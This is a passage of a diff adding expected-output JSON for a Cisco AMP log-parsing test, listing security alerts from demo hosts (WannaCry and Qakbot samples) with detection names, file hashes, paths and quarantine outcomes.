"related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741857", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 178000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43279, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741856", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 163000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 44631, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214500913741856", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 709000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 45976, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214488028839966", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 447000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214492323807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 47096, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419214488028839966", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 916000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214488028840000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 48216, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 5580, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:29:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.event_type_id": 1107296257, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 535214029, + "event.action": "Potential Dropper Infection", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945890085425, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T13:29:36.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 49823, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:28:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 341000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412574627503014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 51019, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204910251769881", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 50000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 51942, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204910251769885", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 596000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 53134, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204910251769881", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 34000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 54407, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802584", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 55679, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802583", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 894000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 56872, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802582", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 58065, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802581", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 59258, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802580", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 60451, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 644000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 61637, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 4688, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204905956802580", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 286000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 63166, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 64439, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + 